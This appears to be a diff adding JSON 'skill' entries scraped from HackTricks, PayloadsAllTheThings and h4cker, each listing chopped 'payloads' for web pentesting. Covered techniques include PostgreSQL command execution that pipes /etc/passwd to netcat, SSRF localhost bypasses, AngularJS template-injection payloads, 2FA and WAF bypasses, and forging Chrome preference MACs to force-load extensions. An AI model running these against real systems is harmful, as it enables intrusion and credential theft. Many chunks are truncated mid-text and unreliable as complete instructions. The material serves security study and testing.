+++ b/skills/osint_f174065a718e.json
@@ -0,0 +1,27 @@
+{
+ "id": "osint_f174065a718e",
+ "category": "osint",
+ "title": "dns zone transfer",
+ "description": "# DNS Zone Transfer\n\n[Digi.ninja](https://digi.ninja/projects/zonetransferme.php) has an amazing explanation of DNS zone transfer attacks and resource for you to practice this in a safe environment. The domain available to practice is `zonetransfer.me` and the two name servers are `nsztm1.digi.ninja` and `nsztm2.digi.ninja`. \n\n```\n# dig axfr @nsztm1.digi.ninja zonetransfer.me\n\n; <<>> DiG 9.9.5-3ubuntu0.6-Ubuntu <<>> axfr @nsztm1.digi.ninja zonetransfer.me\n; (1 server found)\n;; global options: +c",
+ "payloads": [
+ "# DNS Zone Transfer",
+ "[Digi.ninja](https://digi.ninja/projects/zonetransferme.php) has an amazing explanation of DNS zone transfer attacks and resource for you to practice this in a safe environment. The domain available to practice is `zonetransfer.me` and the two name servers are `nsztm1.digi.ninja` and `nsztm2.digi.ninja`.",
+ "# dig axfr @nsztm1.digi.ninja zonetransfer.me",
+ "; <<>> DiG 9.9.5-3ubuntu0.6-Ubuntu <<>> axfr @nsztm1.digi.ninja zonetransfer.me",
+ "; (1 server found)",
+ ";; global options: +cmd",
+ "zonetransfer.me. 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2014101601 172800 900 1209600 3600",
+ "zonetransfer.me. 300 IN HINFO \"Casio fx-700G\" \"Windows XP\"",
+ "zonetransfer.me. 301 IN TXT \"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA\"",
+ "zonetransfer.me. 7200 IN MX 0 ASPMX.L.GOOGLE.COM.",
+ "zonetransfer.me. 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM.",
+ "zonetransfer.me. 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM.",
+ "zonetransfer.me. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM.",
+ "zonetransfer.me. 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM.",
+ "zonetransfer.me. 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Reconnaissance_and_Enumeration/Information_Gathering/osint/dns-zone-transfer.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/payloadsallthethings-1ac94a531348.json b/skills/payloadsallthethings-1ac94a531348.json
new file mode 100644
index 0000000..52f1635
--- /dev/null
+++ b/skills/payloadsallthethings-1ac94a531348.json
@@ -0,0 +1,27 @@
+{
+ "id": "payloadsallthethings-1ac94a531348",
+ "category": "PAYLOADSALLTHETHINGS",
+ "title": "README",
+ "description": "# Payloads All The Things\n\nA list of useful payloads and bypasses for Web Application Security.\nFeel free to improve with your payloads and techniques!\n\nYou can also contribute with a :beers: IRL, or using the sponsor button.\n\n[](https://github.com/sponsors/swisskyrepo)\n[](https://twitter.",
+ "payloads": [
+ "[](https://github.com/sponsors/swisskyrepo)",
+ "[](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)",
+ "An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThings/).",
+ "
",
+ "",
+ "- [InternalAllTheThings](https://swisskyrepo.github.io/InternalAllTheThings/) - Active Directory and Internal Pentest Cheatsheets",
+ "- [HardwareAllTheThings](https://swisskyrepo.github.io/HardwareAllTheThings/) - Hardware/IOT Pentesting Wiki",
+ "You want more? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/BOOKS.md) and [YouTube channel](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/YOUTUBE.md) selections.",
+ "Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CONTRIBUTING.md)",
+ "
",
+ "",
+ "",
+ "| [](https://serpapi.com) | **SerpApi** is a real time API to access Google search results. It solves the issues of having to rent proxies, solving captchas, and JSON parsing. |",
+ "| [](https://projectdiscovery.io/) | **ProjectDiscovery** - Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives. |",
+ "| [](https://www.vaadata.com/) | **VAADATA** - Ethical Hacking Services |"
+ ],
+ "references": [
+ "PayloadsAllTheThings/README.md"
+ ],
+ "source": "PayloadsAllTheThings"
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_029c5b1df41a.json b/skills/pentesting_web_029c5b1df41a.json
new file mode 100644
index 0000000..a557167
--- /dev/null
+++ b/skills/pentesting_web_029c5b1df41a.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_029c5b1df41a",
+ "category": "pentesting-web",
+ "title": "rce with postgresql extensions",
+ "description": "# RCE with PostgreSQL Extensions\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## PostgreSQL Extensions\n\nPostgreSQL has been developed with extensibility as a core feature, allowing it to seamlessly integrate extensions as if they were built-in functionalities. These extensions, essentially libraries written in C, enrich the database with additional functions, operators, or types.\n\nFrom version 8.1 onwards, a specific requirement is imposed on the extension libraries: they must be compi",
+ "payloads": [
+ "# RCE with PostgreSQL Extensions",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## PostgreSQL Extensions",
+ "PostgreSQL has been developed with extensibility as a core feature, allowing it to seamlessly integrate extensions as if they were built-in functionalities. These extensions, essentially libraries written in C, enrich the database with additional functions, operators, or types.",
+ "From version 8.1 onwards, a specific requirement is imposed on the extension libraries: they must be compiled with a special header. Without this, PostgreSQL will not execute them, ensuring only compatible and potentially secure extensions are used.",
+ "Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)",
+ "### RCE in Linux",
+ "**For more information check: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**",
+ "The execution of system commands from PostgreSQL 8.1 and earlier versions is a process that has been clearly documented and is straightforward. It's possible to use this: [Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).",
+ "```sql",
+ "CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;",
+ "SELECT system('cat /etc/passwd | nc ');",
+ "# You can also create functions to open and write files",
+ "CREATE OR REPLACE FUNCTION open(cstring, int, int) RETURNS int AS '/lib/libc.so.6', 'open' LANGUAGE 'C' STRICT;",
+ "CREATE OR REPLACE FUNCTION write(int, cstring, int) RETURNS int AS '/lib/libc.so.6', 'write' LANGUAGE 'C' STRICT;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_0a3b49ce30d8.json b/skills/pentesting_web_0a3b49ce30d8.json
new file mode 100644
index 0000000..3456ccc
--- /dev/null
+++ b/skills/pentesting_web_0a3b49ce30d8.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_0a3b49ce30d8",
+ "category": "pentesting-web",
+ "title": "domain subdomain takeover",
+ "description": "# Domain/Subdomain takeover\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Domain takeover\n\nIf you discover some domain (domain.tld) that is **being used by some service inside the scope** but the **company** has **lost** the **ownership** of it, you can try to **register** it (if cheap enough) and let the company know. If this domain is receiving some **sensitive information** like a session cookie via **GET** parameter or in the **Referer** header, this is for sure a **vulnerability**.\n\n",
+ "payloads": [
+ "# Domain/Subdomain takeover",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Domain takeover",
+ "If you discover some domain (domain.tld) that is **being used by some service inside the scope** but the **company** has **lost** the **ownership** of it, you can try to **register** it (if cheap enough) and let the company know. If this domain is receiving some **sensitive information** like a session cookie via **GET** parameter or in the **Referer** header, this is for sure a **vulnerability**.",
+ "### Subdomain takeover",
+ "A subdomain of the company is pointing to a **third-party service with a name not registered**. If you can **create** an **account** in this **third party service** and **register** the **name** being in use, you can perform the subdomain takeover.",
+ "There are several tools with dictionaries to check for possible takeovers:",
+ "- [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)",
+ "- [https://github.com/blacklanternsecurity/bbot](https://github.com/blacklanternsecurity/bbot)",
+ "- [https://github.com/punk-security/dnsReaper](https://github.com/punk-security/dnsReaper)",
+ "- [https://github.com/haccer/subjack](https://github.com/haccer/subjack)",
+ "- [https://github.com/anshumanbh/tko-sub](https://github.com/anshumanbh/tko-subs)",
+ "- [https://github.com/ArifulProtik/sub-domain-takeover](https://github.com/ArifulProtik/sub-domain-takeover)",
+ "- [https://github.com/SaadAhmedx/Subdomain-Takeover](https://github.com/SaadAhmedx/Subdomain-Takeover)",
+ "- [https://github.com/Ice3man543/SubOver](https://github.com/Ice3man543/SubOver)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/domain-subdomain-takeover.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_0af6a5eff160.json b/skills/pentesting_web_0af6a5eff160.json
new file mode 100644
index 0000000..9ed93e8
--- /dev/null
+++ b/skills/pentesting_web_0af6a5eff160.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_0af6a5eff160",
+ "category": "pentesting-web",
+ "title": "url format bypass",
+ "description": "# URL Format Bypass\n\n{{#include ../../banners/hacktricks-training.md}}\n\n### Localhost\n\n```bash\n# Localhost\n0 # Yes, just 0 is localhost in Linuc\nhttp://127.0.0.1:80\nhttp://127.0.0.1:443\nhttp://127.0.0.1:22\nhttp://127.1:80\nhttp://127.000000000000000.1\nhttp://0\nhttp:@0/ --> http://localhost/\nhttp://0.0.0.0:80\nhttp://localhost:80\nhttp://[::]:80/\nhttp://[::]:25/ SMTP\nhttp://[::]:3128/ Squid\nhttp://[0000::1]:80/\nhttp://[0:0:0:0:0:ffff:127.0.0.1]/thefile\nhttp://\u2460\u2461\u2466.\u24ea.\u24ea.\u24ea\n\n# CDIR bypass\nhttp://127.127.",
+ "payloads": [
+ "# URL Format Bypass",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Localhost",
+ "```bash",
+ "# Localhost",
+ "0 # Yes, just 0 is localhost in Linuc",
+ "http://127.0.0.1:80",
+ "http://127.0.0.1:443",
+ "http://127.0.0.1:22",
+ "http://127.1:80",
+ "http://127.000000000000000.1",
+ "http://0",
+ "http:@0/ --> http://localhost/",
+ "http://0.0.0.0:80",
+ "http://localhost:80"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_0dd8cc04a6fb.json b/skills/pentesting_web_0dd8cc04a6fb.json
new file mode 100644
index 0000000..2988636
--- /dev/null
+++ b/skills/pentesting_web_0dd8cc04a6fb.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_0dd8cc04a6fb",
+ "category": "pentesting-web",
+ "title": "uuid insecurities",
+ "description": "# UUID Insecurities\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nUniversally Unique Identifiers (UUIDs) are **128-bit numbers used to uniquely identify information** in computer systems. UUIDs are essential in applications where unique identifiers are necessary without central coordination. They are commonly used as database keys and can refer to various elements like documents and sessions.\n\nUUIDs are designed to be unique and **hard to guess**. They are structured in ",
+ "payloads": [
+ "# UUID Insecurities",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Universally Unique Identifiers (UUIDs) are **128-bit numbers used to uniquely identify information** in computer systems. UUIDs are essential in applications where unique identifiers are necessary without central coordination. They are commonly used as database keys and can refer to various elements like documents and sessions.",
+ "UUIDs are designed to be unique and **hard to guess**. They are structured in a specific format, divided into five groups represented as 32 hexadecimal digits. There are different versions of UUIDs, each serving different purposes:",
+ "- **UUID v1** is time-based, incorporating the timestamp, clock sequence, and node ID (MAC address), but it can potentially expose system information.",
+ "- **UUID v2** is similar to v1 but includes modifications for local domains (not widely used).",
+ "- **UUID v3 and v5** generate UUIDs using hash values from namespace and name, with v3 using MD5 and v5 using SHA-1.",
+ "- **UUID v4** is generated almost entirely randomly, providing a high level of anonymity but with a slight risk of duplicates.",
+ "> [!TIP]",
+ "> Note that the version and subversion of the UUID usually appears in the same possition inside the UUID. For example in:\\",
+ "> 12345678 - abcd - 1a56 - a539 - 103755193864\\",
+ "> xxxxxxxx - xxxx - Mxxx - Nxxx - xxxxxxxxxxxx",
+ "> - The **position of the M** Indicates the UUID **version**. In the example above, it\u2019s UUID v**1**.",
+ "> - The **position of the N** Indicates the UUID variant."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/uuid-insecurities.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_0ddff4abf170.json b/skills/pentesting_web_0ddff4abf170.json
new file mode 100644
index 0000000..cc8c277
--- /dev/null
+++ b/skills/pentesting_web_0ddff4abf170.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_0ddff4abf170",
+ "category": "pentesting-web",
+ "title": "client side prototype pollution",
+ "description": "# Client Side Prototype Pollution\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Discovering using Automatic tools\n\nThe tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)**,** [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **and** [**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find) can be used to **find prototype pollution vulnerabilities**.\n\nMoreover, you could also use",
+ "payloads": [
+ "# Client Side Prototype Pollution",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Discovering using Automatic tools",
+ "The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)**,** [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **and** [**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find) can be used to **find prototype pollution vulnerabilities**.",
+ "Moreover, you could also use the **browser extension** [**PPScan**](https://github.com/msrkp/PPScan) to **automatically** **scan** the **pages** you **access** for prototype pollution vulnerabilities.",
+ "### Debugging where a property is used ",
+ "```javascript",
+ "// Stop debugger where 'potentialGadget' property is accessed",
+ "Object.defineProperty(Object.prototype, \"potentialGadget\", {",
+ "__proto__: null,",
+ "get() {",
+ "console.trace()",
+ "return \"test\"",
+ "### Finding the root cause of Prototype Pollution ",
+ "Once a prototype pollution vulnerability has been identified by any of the tools, and if the code is not overly complex, you might find the vulnerability by searching for keywords such as `location.hash`, `decodeURIComponent`, or `location.search` in the Chrome Developer Tools. This approach allows you to pinpoint the vulnerable section of the JavaScript code."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_0eb06499e4dc.json b/skills/pentesting_web_0eb06499e4dc.json
new file mode 100644
index 0000000..87c8ea4
--- /dev/null
+++ b/skills/pentesting_web_0eb06499e4dc.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_0eb06499e4dc",
+ "category": "pentesting-web",
+ "title": "basic java deserialization objectinputstream readobject",
+ "description": "# Basic Java Deserialization with ObjectInputStream readObject\n\n{{#include ../../banners/hacktricks-training.md}}\n\nIn this POST it's going to be explained an example using `java.io.Serializable` **and why overriding `readObject()` can be extremely dangerous if the incoming stream is attacker-controlled**.\n\n## Serializable\n\nThe Java `Serializable` interface (`java.io.Serializable`) is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object",
+ "payloads": [
+ "# Basic Java Deserialization with ObjectInputStream readObject",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "In this POST it's going to be explained an example using `java.io.Serializable` **and why overriding `readObject()` can be extremely dangerous if the incoming stream is attacker-controlled**.",
+ "## Serializable",
+ "The Java `Serializable` interface (`java.io.Serializable`) is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [`ObjectOutputStream`](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [`ObjectInputStream`](http://tutorials.jenkov.com/java-io/objectinputstream.html).",
+ "### Reminder: Which methods are implicitly invoked during deserialization?",
+ "1. `readObject()` \u2013 class-specific read logic (if implemented and *private*).",
+ "2. `readResolve()` \u2013 can replace the deserialized object with another one.",
+ "3. `validateObject()` \u2013 via `ObjectInputValidation` callbacks.",
+ "4. `readExternal()` \u2013 for classes implementing `Externalizable`.",
+ "5. Constructors are **not** executed \u2013 therefore gadget chains rely exclusively on the previous callbacks.",
+ "Any method in that chain that ends up invoking attacker-controlled data (command execution, JNDI lookups, reflection, etc.) turns the deserialization routine into an RCE gadget.",
+ "Lets see an example with a **class Person** which is **serializable**. This class **overwrites the readObject** function, so when **any object** of this **class** is **deserialized** this **function** is going to be **executed**.\\",
+ "In the example, the **readObject** function of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog (for some reason) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:**",
+ "**The following example is from **"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_13073c5dc8bf.json b/skills/pentesting_web_13073c5dc8bf.json
new file mode 100644
index 0000000..34d12f6
--- /dev/null
+++ b/skills/pentesting_web_13073c5dc8bf.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_13073c5dc8bf",
+ "category": "pentesting-web",
+ "title": "less code injection",
+ "description": "# LESS Code Injection leading to SSRF & Local File Read\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nLESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed (\"inline\") their contents into the resulting CSS when the `(inline)` option is used.\n\nWhen an application concatenates **user-controlled input** into a string that is",
+ "payloads": [
+ "# LESS Code Injection leading to SSRF & Local File Read",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed (\"inline\") their contents into the resulting CSS when the `(inline)` option is used.",
+ "When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**. By abusing `@import (inline)` the attacker can force the server to retrieve:",
+ "* Local files via the `file://` protocol (information disclosure / Local File Inclusion).",
+ "* Remote resources on internal networks or cloud metadata services (SSRF).",
+ "This technique has been seen in real-world products such as **SugarCRM \u2264 14.0.0** (`/rest/v10/css/preview` endpoint).",
+ "### Exploitation",
+ "1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).",
+ "2. Close the current statement and inject new directives. The most common primitives are:",
+ "* `;` \u2013 terminates the previous declaration.",
+ "* `}` \u2013 closes the previous block (if required).",
+ "3. Use `@import (inline) '';` to read arbitrary resources.",
+ "4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.",
+ "#### Local File Read"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xs-search/css-injection/less-code-injection.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_16fb8fc07291.json b/skills/pentesting_web_16fb8fc07291.json
new file mode 100644
index 0000000..46d546a
--- /dev/null
+++ b/skills/pentesting_web_16fb8fc07291.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_16fb8fc07291",
+ "category": "pentesting-web",
+ "title": "client side template injection csti",
+ "description": "# Client Side Template Injection (CSTI)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Summary\n\nIt is like a [**Server Side Template Injection**](ssti-server-side-template-injection/index.html) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.\n\n**Testing** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter expects **a te",
+ "payloads": [
+ "# Client Side Template Injection (CSTI)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Summary",
+ "It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/index.html) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.",
+ "**Testing** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter expects **a template** and will execute it. For example, with a payload like `{{ 7-7 }}`, if the app is **vulnerable** you will see a `0`, and if not, you will see the original: `{{ 7-7 }}`",
+ "## AngularJS",
+ "AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.",
+ "In scenarios where user input is dynamically inserted into the HTML body tagged with `ng-app`, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:",
+ "```javascript",
+ "{{$on.constructor('alert(1)')()}}",
+ "{{constructor.constructor('alert(1)')()}}",
+ "",
+ "",
+ "",
+ "You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/client-side-template-injection-csti.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_174b76f18152.json b/skills/pentesting_web_174b76f18152.json
new file mode 100644
index 0000000..87e92ba
--- /dev/null
+++ b/skills/pentesting_web_174b76f18152.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_174b76f18152",
+ "category": "pentesting-web",
+ "title": "server side xss dynamic pdf",
+ "description": "# Server Side XSS (Dynamic PDF)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Server Side XSS (Dynamic PDF)\n\nIf a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\\\nSo, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.\n\nPlease, notice that the `` tags don't ",
+ "payloads": [
+ "# Server Side XSS (Dynamic PDF)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Server Side XSS (Dynamic PDF)",
+ "If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\\",
+ "So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.",
+ "Please, notice that the `` tags don't work always, so you will need a different method to execute JS (for example, abusing ` Key idea: Chromium stores per-user extension state in a JSON preferences file and protects it with HMAC-SHA256. If you compute valid MACs with the browser\u2019s embedded seed and write them next to your injected nodes, the browser accepts and activates your extension entry.",
+ "## Where extension state lives (Windows)",
+ "- Non\u2013domain\u2011joined Chrome profile:",
+ "- %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Secure Preferences (includes a root \"super_mac\").",
+ "- Domain\u2011joined Chrome profile:",
+ "- %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Preferences",
+ "- Key nodes used by Chromium:",
+ "- extensions.settings. \u2192 embedded manifest/metadata for the extension entry",
+ "- protection.macs.extensions.settings. \u2192 HMAC for that JSON blob",
+ "- Chromium \u2265134: extensions.ui.developer_mode (boolean) must be present and MAC\u2011signed for unpacked extensions to activate",
+ "Simplified schema (illustrative):"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/browser-extension-pentesting-methodology/forced-extension-load-preferences-mac-forgery-windows.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_233ec089dc8f.json b/skills/pentesting_web_233ec089dc8f.json
new file mode 100644
index 0000000..a5573ab
--- /dev/null
+++ b/skills/pentesting_web_233ec089dc8f.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_233ec089dc8f",
+ "category": "pentesting-web",
+ "title": "proxy waf protections bypass",
+ "description": "# Proxy / WAF Protections Bypass\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Bypass Nginx ACL Rules with Pathname Manipulation \n\nTechniques [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).\n\nNginx rule example:\n\n```plaintext\nlocation = /admin {\n den",
+ "payloads": [
+ "# Proxy / WAF Protections Bypass",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Bypass Nginx ACL Rules with Pathname Manipulation ",
+ "Techniques [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).",
+ "Nginx rule example:",
+ "```plaintext",
+ "location = /admin {",
+ "deny all;",
+ "location = /admin/ {",
+ "deny all;",
+ "In order to prevent bypasses Nginx performs path normalization before checking it. However, if the backend server performs a different normalization (removing characters that nginx doesn't remove) it might be possible to bypass this defense.",
+ "### **NodeJS - Express**",
+ "| Nginx Version | **Node.js Bypass Characters** |",
+ "| ------------- | ----------------------------- |",
+ "| 1.22.0 | `\\xA0` |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/proxy-waf-protections-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_26d30a2f67fa.json b/skills/pentesting_web_26d30a2f67fa.json
new file mode 100644
index 0000000..a3b49f4
--- /dev/null
+++ b/skills/pentesting_web_26d30a2f67fa.json
@@ -0,0 +1,18 @@
+{
+ "id": "pentesting_web_26d30a2f67fa",
+ "category": "pentesting-web",
+ "title": "cypher injection neo4j",
+ "description": "# Cypher Injection (neo4j)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nCheck the following blogs:\n\n- [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits)\n- [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)\n\n{{#include ../../banners/hacktricks-",
+ "payloads": [
+ "# Cypher Injection (neo4j)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Check the following blogs:",
+ "- [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits)",
+ "- [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/sql-injection/cypher-injection-neo4j.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_28ed8c91fec9.json b/skills/pentesting_web_28ed8c91fec9.json
new file mode 100644
index 0000000..2d80881
--- /dev/null
+++ b/skills/pentesting_web_28ed8c91fec9.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_28ed8c91fec9",
+ "category": "pentesting-web",
+ "title": "2fa bypass",
+ "description": "# 2FA/MFA/OTP Bypass\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Enhanced Two-Factor Authentication Bypass Techniques**\n\n### **Direct Endpoint Access**\n\nTo bypass 2FA, access the subsequent endpoint directly, knowing the path is crucial. If unsuccessful, alter the **Referrer header** to mimic navigation from the 2FA verification page.\n\n### **Token Reuse**\n\nReutilizing previously used tokens for authentication within an account can be effective.\n\n### **Utilization of Unused Tokens**\n\nEx",
+ "payloads": [
+ "# 2FA/MFA/OTP Bypass",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Enhanced Two-Factor Authentication Bypass Techniques**",
+ "### **Direct Endpoint Access**",
+ "To bypass 2FA, access the subsequent endpoint directly, knowing the path is crucial. If unsuccessful, alter the **Referrer header** to mimic navigation from the 2FA verification page.",
+ "### **Token Reuse**",
+ "Reutilizing previously used tokens for authentication within an account can be effective.",
+ "### **Utilization of Unused Tokens**",
+ "Extracting a token from one's own account to bypass 2FA in another account can be attempted.",
+ "### **Exposure of Token**",
+ "Investigate whether the token is disclosed in a response from the web application.",
+ "### **Verification Link Exploitation**",
+ "Using the **email verification link sent upon account creation** can allow profile access without 2FA, as highlighted in a detailed [post](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b).",
+ "### **Session Manipulation**",
+ "Initiating sessions for both the user's and a victim's account, and completing 2FA for the user's account without proceeding, allows an attempt to access the next step in the victim's account flow, exploiting backend session management limitations."
+ ],
+ "source": "HackTricks",
+ "references": [
